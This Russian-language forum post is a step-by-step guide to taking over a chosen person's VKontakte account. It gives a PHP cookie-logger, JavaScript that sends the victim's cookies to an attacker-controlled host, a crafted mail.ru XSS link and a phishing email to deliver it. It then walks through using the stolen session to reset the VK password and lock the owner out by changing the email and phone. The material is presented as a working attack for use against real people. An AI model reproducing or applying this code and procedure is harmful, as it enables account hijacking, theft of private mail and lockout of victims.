Доброе время суток!
Сейчас я Вам расскажу, как взломать страничку вк при помощи js.
Итак, нам понадобится:
Хостинг (бесплатный)
Домен (бесплатный, я взял с freenom.com)
Знание js
Знание php
Голова на плечах
Предисловие (читать обязательно).
Мы не будем ломать страничку вк по номеру телефона. Мы это сделаем при помощи e-mail.
Итак, есть юзер, который на данный момент сидит у себя на почте (не нажал кнопку "Выйти"). У него в куках остались данные для входа. Соответственно, когда он нажмет кнопку "Выйти", они пропадут. Эти данные - это номер сессии, ключ сессии и т.д., НО НЕ ЛОГИН И ПАРОЛЬ. С этими данными можно войти в его почту БЕЗ ЛОГИНА И ПАРОЛЯ, но до тех пор, пока он не нажмет кнопку "Выйти". Надеюсь что понятно.
Итак, мы будем воровать куки вместе с этими данными, которые позволят нам войти без логина и пароля.
Давайте сначала определимся, что мы будем делать:
1. Мы узнаем имя пользователя вконтакте, т.е. цель, например, Вася Петров.
2. Мы воруем куки.
3. Мы входим в его почту.
4. Мы заходим вконтакте, нажимаем я забыл пароль, вводим почту и отправляем форму для восстановления пароля.
5. Опять заходим на его почту.
6. Смотрим ссылку для восстановления пароля.
7. Восстанавливаем пароль, записываем его себе.
8. Меняем почту таким образом, чтобы юзер не смог восстановить его опять.
9. Меняем телефон.
10. Аккаунт взломан.
ВСЕ ЧТО НАМ НАДО СДЕЛАТЬ - ТУПО УКРАСТЬ КУКИ.
Итак, приступим.
Для начала читаем уже готовые статьи как сделать снифер куков из разных источников
https://habr.com/post/129173/
https://hpc.name/thread/20125/p1.html
https://antichat.com/threads/158312/
https://www.securitylab.ru/forum/forum20/topic47938/
А теперь пишем снифер, который мы будем заливать на хостинг. Программисты поймут, ламеры пройдут мимо, так ничего и не поняв))
Код я взял готовый из хабра:
<?php if (isset($_GET['cookie'])) { $text = "New cookie accept from ". $_SERVER['REMOTE_ADDR'] ." at ". date('l jS \of F Y h:i:s A'); $text .= "\n".str_repeat("=", 22) . "\n" . $_GET['cookie']."\n".str_repeat("=", 22)."\n"; $file = fopen("sniff.txt", "a"); fwrite($file, $text); fclose($file); } ?>
Просто тупо сохраняем как sniff.php и заливаем на хостинг.
P.S. В зависимости от настроек хостинга он может не работать и не определять IP адрес.
Далее заливаем тоже готовый js на хостинг
img=new Image(); img.src='http://sitename.ru/sniff.php?cookie='+document.cookie; function F() { location='http://www.solife.ru'; } setTimeout(F, 5000);
сохраняем в той же директории, что и sniff.php как test.js.
Но меняем в скрипте http://sitename.ru на Ваш домен (имя Вашего сайта), а http://www.solife.ru меняем на http://vk.com/im
ДАЛЬШЕ. Мы должны знать e-mail жертвы. ДАННЫЙ МЕТОД РАБОТАЕТ ТОЛЬКО НА ПОЧТЕ mail.ru (ЕЕ ЛУЧШЕ НЕ РЕГИСТРИРУЙТЕ)!
Итак, на e-mail жертвы высылаем письмо следующего содержания:
Здравствуйте! Спасибо за регистрацию на сайте coder.rusff.me! Если Вы не регистрировались на сайте, нажмите <сюда>! '><script src='http://sitename.ru/test.js'></script>
Вместо <сюда> вставляете ссылку при помощи редактора писем mail.ru
e.mail.ru/cgi-bin/gosearch?q_folder=0&q_query=%27%3E%3Cscript%20src%3D%27http%3A%2F%2Fsitename.ru%2Ftest.js%27%3E%3C%2Fscript
Имя ссылки должно быть "сюда".
Вместо http://sitename.ru/test.js
Ставите http://имя вашегодомена/test.js
И отсылаете письмо.
Хакеры - не волшебники.
Сработает или нет - никто из нас не знает.
Отредактировано Grilari (2018-08-26 13:50:03)